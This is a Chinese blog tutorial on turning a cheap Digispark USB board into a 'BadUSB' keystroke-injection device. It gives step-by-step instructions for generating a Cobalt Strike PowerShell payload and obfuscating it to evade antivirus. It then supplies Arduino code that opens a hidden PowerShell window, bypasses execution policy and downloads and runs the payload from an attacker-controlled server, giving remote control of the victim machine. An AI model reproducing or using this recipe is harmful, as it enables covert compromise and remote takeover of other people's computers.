BadUsb制作

最新推荐文章于 2022-08-17 11:55:33 发布
最新推荐文章于 2022-08-17 11:55:33 发布
阅读量8k 收藏 67
点赞数 7
分类专栏: 硬件 文章标签: 网络安全 渗透测试 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34341458/article/details/123368269
版权

型号:

Digispark kickstarter 微型USB开发板 ATTINY58

就是下面这种

x宝有卖9元左右。

img

一. 准备:

attiny驱动下载:https://www.arduino.cc/en/Main/Software?setlang=cn

Arduino IDE:https://www.arduino.cc/en/software

免杀工具(自选):https://github.com/danielbohannon/Invoke-Obfuscation

CobaltStrike且有公网IP

二、CS payload制作+免杀

1.生成脚本

(1). 需要一台安装了CobaltStrike的公网IP服务器,生成powershell可执行程序,格式为ps1

大略说下重点,其他自行百度CS powershell马生成。

(2)

img

img

然后选择生成的路径进行保存。我这里保存在桌面的badusb文件夹,文件名为payload.ps1

2. 免杀处理(Invoke-Obfuscation)

免杀工具下载地址:https://github.com/danielbohannon/Invoke-Obfuscation

(1). 管理员权限运行powershell

img

进入到下载的文件Invoke-Obfuscation-master文件夹下:cd xxxx\xxxx\xxx\Invoke-Obfuscation-master

img

然后依次输入下面的代码:

Import-Module C:\文件的路径\Desktop\badusb\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1 # 导入模块,要注意路径
Invoke-Obfuscation

img

然后依次输入:

set scriptpath C:\文件路径\Desktop\badusb\payload.ps1 # cs生成payload的路径
encoding
1

img

 out shell.ps1  #  输出,默认输出在软件所在文件夹。

img

输出成功后会自己用记事本打开。

然后需要将生成的ps1文件上传到自己服务器网站下,通过建立网站,构造下载链接,例如http://xx.xx.xx.xx:9999/shell.ps1,实现访问链接就可以下载这个文件的效果。

三、编写程序,写入开发板

  1. 将开发板usb插入到电脑上,电脑会自动安装驱动,如果没有安装成功(设备管理器查看是否有黄色问号,有就是没有装好,那就安装)

下载网址:https://www.arduino.cc/en/Main/Software?setlang=cn

  1. 下载工具:Arduino IDE

下载网址:https://www.arduino.cc/en/software

img

img

  1. 打开Arduino IDE进行设置
  • 文件-首选项,在附加开发板管理网站填入网址:http://digistump.com/package_digistump_index.json
  • 然后软件会下载索引,时间可能有点久,视网络情况,如果不成功,使用代理爬梯子下载

img

  • 然后:工具——开发板——开发板管理,下载Arduino AVR Boards,安装之后才会显示版本号,版本号为1.6.7

imgimg

  • 安装完成后,进行如下选择:

img

  1. 将下列代码填入IDE中,并对服务器及生成的shell地址进行修改。实现通过伪造键盘,输出win+r打开cmd输入powershell命令,下载文件并运行。
#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_BACKSPACE 42
#define KEY_TAB     43
#define KEY_PRT_SCR 70
#define KEY_DELETE  76

void setup() {

DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.delay(500);
# 将下面ip替换为自己网站服务器的IP,实现访问url便触发下载的操作。
DigiKeyboard.print(F("powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://XX.XX.XX.XX:XXXX/shell.ps1');"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(750);
DigiKeyboard.sendKeyStroke(KEY_ENTER);

}
void loop() {
}

img

  1. 点击左上角的对号进行编译测试,不报错就可以进行下一步。

img

  1. 暂时不需要将开发板插到电脑上,先拔下来。

然后点击左上角的上传:

img

编译成功后,会显示请在60s内插入设备,然后插入设备,等待上传。

上传成功图

img.

  1. 不出意外,几秒内,机器会打开cmd,然后输入命令运行。

需要注意的是,要保证输入法在英文状态下,才能成功,中文状态下会被输入中文,导致不成功。

  1. CS也有主机上线

img

Tips:开发板重新上传脚本的话,可以拔下开发板,然后IDE上传,显示在60s内插入开发板后,再将开发板插入电脑,等待上传就OK了。

初版经过多次测试,有部分杀毒软件是会有弹窗的,由于平时用不太到,也就没有多花时间继续深入研究。

参考:https://lzy-wi.github.io/2018/06/12/badusb/

Redamancy——
关注
  • 7
    点赞
  • 67
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[Psychson-master] BadUSB制作工程源代码
05-02
2014年GitHub上公布的BadUSB制作的工程源码。 包括:DriveCom、EmbedPayload、firmware、Injector、tools等文件以及使用说明。
BADUSB 制作
NEARU的专栏
07-05 1822
BADUSB 制作 一.准备 硬件: Badusb 一个(TB 已购买,可直接使用) 软件 arduino-1.8.5(用于写入程序) 二.安装arduino-1.8.5 点击I agree 之后,一直点击Next即可完成安装。安装完之后对应的驱动也会安装。 三.arduino-1.8.5连接BadUSB 3.1 插入badusb。 等待电脑给出设...
BadUSB制作教程
weixin_40485904的博客
02-04 1655
BadUSB制作教程BadUSB的优点制作BadUSB的几种板子那么来做一个BadUSB怎么样? 和大多数人一样,最初见到BadUSB是在美剧《黑客军团》中,是fsociety组织常用的工具之一,无论是向服务器下载木马控制被害者主机,还是达琳在停车场帅气的扔出大量USB钓鱼,BadUSB都是功不可没的物理武器之一。 剧情中使用Hak5的USB rubber ducky控制目标主机 达琳在停车场扔BadUSB钓鱼 BadUSB的优点 在USB攻击领域,很多年前常用的是老式USB病毒autorun.inf,
badusb详细制作教程(两种方式实现远控)
Ghost_system的博客
08-17 1万+
badusb是一种几乎可以突破任何杀毒软件和防火墙的设备,堪称渗透测试利器 文章目录前言一、什么是badusb?二,badusb的优点三,badusb是如何攻击的?badusb原理HID攻击漏洞产生原因三、准备步骤1.设备2,编辑器的安装与设置四,编写代码(重点)第一种: SEToolkit + badusb实现PowerShell注入攻击第二种:Cobalt Strike + badusb 实现PowerShell注入攻击五,烧录六,badusb有多强大攻击场景总结 BadUSB是《黑客军团》中
BadUSB制作教程_BadUSB简单示例(初学)_程序编写工具
Jason Xu 的博客
04-10 5628
说明 本文章仅供学习交流,请勿用于非法用途 我用的是CJMCU-Beetle arduino Leonardo USB ATMEGA32U4 Mini Size Development Board 官网购买地址https://www.thanksbuyer.com/cjmcu-beetle-arduino-leonardo-usb-atmega32u4-mini-size-development-board-35975 软件-Arduino Kali下自带 Windows下 官网下载地址 https://
badusb.zip_bad usb_badusb_badusb下载_badusb制作教程_badusb脚本开发
09-21
badusb制作工具包,需要自行打包带走
badusb_badusb_
09-29
badusb资料,需要自行打包带走
Badusb下载源码
09-24
Badusb下载源码void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release...
stm32 badusb
11-01
stm32f103C8T6制作badUSB,晶振用的12M 如果是8M晶振需改回来。
badusb代码.zip
07-25
分享一款badusb的代码,测试过还是可以正常使用。希望帮到有需要的小伙伴。
bad usb编译器
08-08
bad usb的编译器,欢迎下载。 Digispark Digispark是一个基于ATTINY85微控制器的开发板,体积小且价钱便宜,功能方面则没有Arduino般强大。代码与Arduino大同小異,也是使用Arduino IDE开发。 Digispark是Digistump LLC (digistump.com)版权所有,请使用者仔细阅读Digispark使用协议和版权声明 Digispark的特别之处是使用了USB与电脑沟通,省了USB至串口转换器。为此,Digispark必须占用2KB的快闪记忆体(Flash Memory)以便用来安装Bootloader。 Digispark的功能 打开Examples,大概知道Digispark的功能到达什么程度了。麻雀虽小,五脏俱全。
BADUSB代码及服务器地址.txt
07-21
BADUSB代码及服务器地址,主要用于arduino配置及BADUSB制作
badusb代码daquan.zip
06-22
badusb代码daquan.zip
Arduino BadUSB 程序编写工具
04-11
教程: [https://blog.csdn.net/weixin_45447477/article/details/115563085]
Badusb原理及制作并简单免杀实现远控教程
天乐的博客
10-23 1万+
2014年美国黑帽大会上研究人员JakobLell和Karsten Nohl展示了badusb的攻击方法后,国内与badusb相关的文章虽然有了一些,但是大部分人把相关文章都阅读后还是会有种“不明觉厉”的感觉,badusb仍有一层朦胧的面纱。本文将带你揭开这层神秘的面纱。 Badusb原理:利用HID(Human InterfaceDevice,是计算机直接与人交互的设备,例如键盘、鼠标等)进行攻击,将USB设备伪装使电脑识别为键盘,再利用USB设备中的微控制芯片,向主机发送命令,从而实现完全控制主机。 漏
插一个U盘黑一台电脑-Badusb最详细制作教程
热门推荐
J0o1ey Blog
08-01 2万+
0x001-简介 1.概述 在2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态。...
疯狂的极客--制作BadUSB
Peter_FHC的博客
05-30 785
文章目录设备软件编写代码(重点) 设备 1、 能够制作badusb的几种常见载体有:Arduino Leonardo、Phison、Teensy、Attiny85、PS2303(芯片)、RUBBER DUCKY等。从专业程度和易用性来讲,RUBBER DUCKY最优(Hak5官方提供了许多现成的按键脚本和payload),但价格也最贵。 2、 一台计算机 软件 下载Arduino开发者工具——Arduino IDE (用来向leonardo烧录程序的软件) 这里是Arduino IDE下载地址:http
用digispark开发板制作Bad USB
lingmessy的博客
10-07 811
用digispark开发板制作Bad USB 材料: digispark开发板一个 软件: arduino IDE Automator https://github.com/CYRO4S/Automator 1.安装digispark开发板的驱动 https://github.com/digistump/DigistumpArduino/releases 点击选择下载更高版本的驱动 下载完后安装 2.设置 arduino IDE 第一步 添加以下开发板管理器网址: http://dig
SEToolkit + badusb
最新发布
07-25
- *1* *2* *3* [badusb详细制作教程(两种方式实现远控)](https://blog.csdn.net/Ghost_system/article/details/126383082)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值